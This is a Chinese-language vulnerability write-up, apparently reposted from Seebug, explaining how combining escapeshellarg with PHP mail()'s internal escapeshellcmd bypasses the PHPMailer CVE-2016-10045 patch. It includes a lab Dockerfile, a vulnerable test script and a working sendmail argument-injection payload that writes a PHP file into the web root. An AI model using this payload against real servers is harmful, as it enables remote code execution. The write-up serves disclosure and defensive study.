php escapeshellcmd,PHP escapeshellarg()+escapeshellcmd() 之殇

最新推荐文章于 2021-11-10 22:17:38 发布
最新推荐文章于 2021-11-10 22:17:38 发布
阅读量348 收藏
点赞数
文章标签: php escapeshellcmd

Author: Hcamael, p0wd3r (知道创宇404安全实验室)

Date: 2016-12-28

0x00 简介

前两天爆出了 PHPMailer 小于 5.2.18 版本的 RCE 漏洞,官方在补丁中使用了escapeshellarg来防止注入参数,但有趣的是经过测试我们发现该补丁是可以被绕过的,并且攻击面可以延伸到更大而不仅仅是局限于这个应用。

0x01 漏洞复现

环境搭建

Dockerfile:

FROM php:5.6-apache

RUN apt-get update && apt-get install -y sendmail

RUN echo 'sendmail_path = "/usr/sbin/sendmail -t -i"' > /usr/local/etc/php/php.ini

提前下载好源码,在源码根目录下添加测试文件 1.php:

require('PHPMailerAutoload.php');

$mail = new PHPMailer;

$mail->setFrom($_GET['x'], 'Vuln Server');

$mail->Subject = 'subject';

$mail->addAddress('c@d.com', 'attacker');

$mail->msgHTML('test');

$mail->AltBody = 'Body';

$mail->send();

?>

shell:

docker build -t bypass-test .

docker run --rm --hostname xxx.xxx --name vuln-phpmail -p 127.0.0.1:8080:80 -v /tmp/PHPMailer-5.2.19:/var/www/html bypass-test

复现

PHPMailer 对之前的漏洞做了如下补丁:

6bdf3d72ab7b1884f3e1802d323a42d3.png

即对输入使用escapeshellarg处理,最新版本中使用之前的 payload 攻击是失败的,例如:a( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com,但是经小伙伴的测试,在最新版中可以使用这个 payload:a'( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com,结果如下:

访问http://127.0.0.1:8080/1.php?x=a%27(%20-OQueueDirectory=/tmp%20-X/var/www/html/x.php%20)@a.com,shell 成写入:

c45ccaaaa4037d3b51cdc8c080312ae5.png

根据调试的结果,我们可以看到参数确实被escapeshellarg处理过了:

542a9ffd862e8837253f0b6539393b71.png

那么为什么用了'就会在这里绕过escapeshellarg的限制呢?

我们看一下mail的代码:https://github.com/php/php-src/blob/PHP-5.6.29/ext/standard/mail.c ,其中第167-177行如下:

if (force_extra_parameters) {

extra_cmd = php_escape_shell_cmd(force_extra_parameters);

} else if (extra_cmd) {

extra_cmd = php_escape_shell_cmd(extra_cmd);

}

if (php_mail(to_r, subject_r, message, headers_trimmed, extra_cmd TSRMLS_CC)) {

RETVAL_TRUE;

} else {

RETVAL_FALSE;

}

可见参数在mail中又经过了escapeshellcmd的处理,将整个过程进行简化:

f676c043af0f7cc150c624db131a69d8.png

可见两个函数配合使用就会导致多个参数的注入。

我们详细分析一下:

传入的参数是:172.17.0.2' -v -d a=1

经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php

最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。

回到mail中,我们的 payload 最终在执行时变成了'-fa'\\''\( -OQueueDirectory=/tmp -X/var/www/html/test.php \)@a.com\',分割后就是-fa\(、-OQueueDirectory=/tmp、-X/var/www/html/test.php、)@a.com',最终的参数就是这样被注入的。

谁的锅?

仔细想想其实这可以算是escapeshellarg和escapeshellcmd的设计问题,因为先转义参数再转义命令是很正常的想法,但是它们在配合时并没有考虑到单引号带来的隐患。

在 PHPMailer 的这次补丁中,作者使用escapeshellarg意在防止参数注入,但是却意外的为新漏洞打了助攻,想想也是很有趣的 xD。

攻击面

如果应用使用escapeshellarg -> escapeshellcmd这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。

如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。

有一点需要注意的是,由于注入的命令中会带有中间的\和最后的',有可能会影响到命令的执行结果,还要结合具体情况再做分析。

如果上述有哪些地方有问题,欢迎大家指正 :)

0x02 时间线

2016/12/28 知道创宇404安全实验室发现 Bypass 并整理文档

2016/12/28 发现 Dawid Golunski 也发现了Bypass 并申请了 CVE,对应编号 CVE-2016-10045

2016/12/28 截止目前官方并未发布更新

0x03 参考

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/164/

不进前一百不改名
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
东隅的博客
09-12 760
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
PHP 中命令行调用 escapeshellarg 函数中文问题
ModStartCMS的博客
01-09 272
这是因为 escapeshellarg 函数默认使用的是 ASCII 字符集,对于非 ASCII 字符,它会将其视为无效字符,并将其过滤掉。在这个例子中,$input 是一个用户输入的字符串,你可以使用 escapeshellarg 将它转义为安全的 shell 参数。escapeshellargPHP 中的一个函数,它可以将字符串转义为安全的 shell 参数。在 PHP 中,你可以使用 escapeshellarg 函数来保证传递给 shell 命令的参数是安全的。这样可以避免命令注入攻击。
基础知识点|命令执行漏洞相关总结
weixin_42282189的博客
11-10 8198
作者: h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 简介 命令执行漏洞是指攻击者可以随意执行系统命令。它属于高危漏洞之一,也属于代码执行的范畴。命令执行漏洞不仅仅存在于B/S架构中,在C/S架构中也常常遇到。 简单的说,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许使用者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码。 0x01 原理 命令执行漏洞是指应用有时.
php escapeshellcmd,从escapeshellcmd bypass说起到宽字节注入
weixin_42500195的博客
03-11 519
1 php 多字节绕过escapeshellcmdescapeshellcmd()对shell元字符过滤加反斜杠;反斜线(\)会在以下字符之前插入: #&;`|*?~<>^()[]{}$, \x0A 和 \xFF,但在php5.2.5及之前存在通过输入多字节绕过escapeshellcmd的问题。5.2.6 已经修复了该问题。执行 escapeshellcmd("echo "....
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2943
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
php使用escapeshellarg时中文被过滤的解决方法
10-21
主要介绍了php使用escapeshellarg时中文被过滤的解决方法,测试后发现问题的原因是shell和apache php-cgi的运行环境不同引起的,需要的朋友可以参考下
PHP安全技术之 实现php基本安全
12-18
如果确实需要执行命令,应对变量进行充分的安全检查,并利用escapeshellarg()和escapeshellcmd()预处理。 第六,**定制会话管理**。改变默认的会话存储路径,或选择使用数据库来保存会话数据,以减少会话劫持的风险...
php代码审计之命令注入(3)
01-09
- 使用 `escapeshellarg()` 和 `escapeshellcmd()` 对用户输入进行转义。 - 避免使用 `system()`, `exec()`, `shell_exec()`, `passthru()` 等函数,除非绝对必要,并且已经采取了充分的安全措施。 - 定期进行代码...
php参数过滤、数据过滤类
05-01
3)在使用系统函数时,必须使用escapeshellarg(),escapeshellcmd()参数去过滤,这样你也就可以放心的使用系统函数。 4)对于跨站,strip_tags(),htmlspecialchars()两个参数都不错,对于用户提交的的带有html和php的...
escapeshellarg escapeshellcmd漏洞
a3320315的博客
01-31 1397
[BUUCTF 2018]Online [BUUCTF 2018]Online 谈escapeshellarg绕过与参数注入漏洞 命令参数注入
php 双字节编码漏洞,php escapeshellcmd多字节编码漏洞解析及延伸
weixin_39761491的博客
03-21 183
作者:T_Torchidy (jnchaha_at_163.com)来源:安全焦点PHP 5 <= 5.2.5PHP 4 <= 4.4.8一些允许如GBK,EUC-KR, SJIS等宽字节字符集的系统都可能受此影响,影响还是非常大的,国内的虚拟主机应该是通杀的,在测试完这个漏洞之后,发现还是十分有意思的,以前也有过 对这种类型安全漏洞的研究,于是就把相关的漏洞解释和一些自己的想法都写出...
php双字节编码漏洞,php escapeshellcmd多字节编码漏洞解析及延伸
weixin_29229261的博客
03-13 160
漏洞公告在http://www.sektioneins.de/advisories/SE-2008-03.txtPHP5<=5.2.5PHP4<=4.4.8一些允许如GBK,EUC-KR,SJIS等宽字节字符集的系统都可能受此影响,影响还是非常大的,国内的虚拟主机应该是通杀的,在测试完这个漏洞之后,发现还是十分有意思的,以前也有过对这种类型安全漏洞的研究,于是就把相关的...
day5-escapeshellargescapeshellcmd使用不当
qq_45951598的博客
01-09 2295
文章目录Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数小案列总结: Day 5 - postcard escapeshellcmd()函数 escapeshellarg()函数 escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 小案列 可见两个函数配合使用就会导致多个参数的注入。 1、传入的参数是:172.17.0.2’ -v -d a=1 2、经过escapeshellarg处理后变成了’172.17.
利用/绕过escapeshellarg/escapeshellcmd函数
LYJ20010728的博客
05-16 5340
利用/绕过escapeshellarg/escapeshellcmd[1]escapeshellargescapeshellcmd的功能[2]已知的绕过/利用参数注入TARFINDEscapeshellcmdescapeshellarg用.bat执行命令SENDMAILCURLMYSQLUNZIP未设置LANG环境变量,则去除非ASCII字符[3]经典EXP[4]GitList RCE漏洞利用 [1]escapeshellargescapeshellcmd的功能 escapeshellarg: (P
一天一道ctf 第20天(escapeshellargescapeshellcmd
scrawman的博客
04-07 797
[强网杯 2019]高明的黑客 作者直接告诉我们源码备份在www.tar.gz,这样就不用扫网站目录了,省了不少时间。 靠当我没有说,这里面几千个文件,怪不得43M。那人工代码审计是不可能的了,只能靠跑脚本。这里观摩了一下网上大神写的脚本: https://blog.csdn.net/a3320315/article/details/102945940 主要是看一下脚本的思路,等以后有能力了再做一遍。 ...
[红日安全]代码审计Day5 - escapeshellargescapeshellcmd使用不当
hongrisec的博客
03-31 723
点击订阅我们    和红日一起成长 让安全如此精彩   红日安全出品|转载请注明来源 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!(来源:红日安全) 本文由红日安全成员: l1nk3r...
PHP内核』PHP 7 escapeshellarg底层探究
Ho1aAs‘s Blog
10-22 823
文章目录escapeshellarg描述歧义静态调试PHP_FUNCTION(escapeshellarg)PHPAPI zend_string *php_escape_shell_arg(char *str)添加前面的引号跳过多字节字符PHP历史漏洞:GBK宽字节注入转义添加后面的引号检查结果有效性返回动态调试完 escapeshellarg描述 escapeshellarg把字符串转义为安全的shell参数 escapeshellarg(string $arg): string Linux:对传入的
[原题复现+审计][BUUCTF 2018]WEB Online Tool(escapeshellargescapeshellcmd使用不当导致rce)...
笑花大王
03-13 292
简介 原题复现:https://github.com/glzjin/buuctf_2018_online_tool (环境php5.6.40) 考察知识点:escapeshellargescapeshellcmd使用不当导致rce 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 简单审计 ...
PHP代码审计————8、 PHP代码审计之命令注入
Fly_鹏程万里
05-16 701
PHP中,可以实现执行外部程序或函数的命令执行函数主要包括以下5个函数System函数可以用来执行一个外部的应用程序并将相应的执行结果输出,函数原型如下:string system(string command, int &amp;return_var)参数说明:command是要执行的命令,return_var存放执行命令的执行后的状态值。按照PHP程序员的想法,命令执行函数的主要作用是可以通...
php执行python脚本
最新发布
05-29
要在 PHP 中执行 Python 脚本,您可以使用 exec() 函数。以下是一个简单的示例: ```php <?php $command = escapeshellcmd('python /path/to/your/python/script.py'); $output = shell_exec($command); echo $output; ?> ``` 在上面的示例中,exec() 函数用于执行 shell 命令,并将 Python 脚本的路径作为参数传递。然后,shell_exec() 函数用于将输出存储在变量 $output 中,并将其打印到屏幕上。 请注意,为了安全起见,我们使用了 escapeshellcmd() 函数来转义命令字符串中的特殊字符。这可以防止潜在的安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值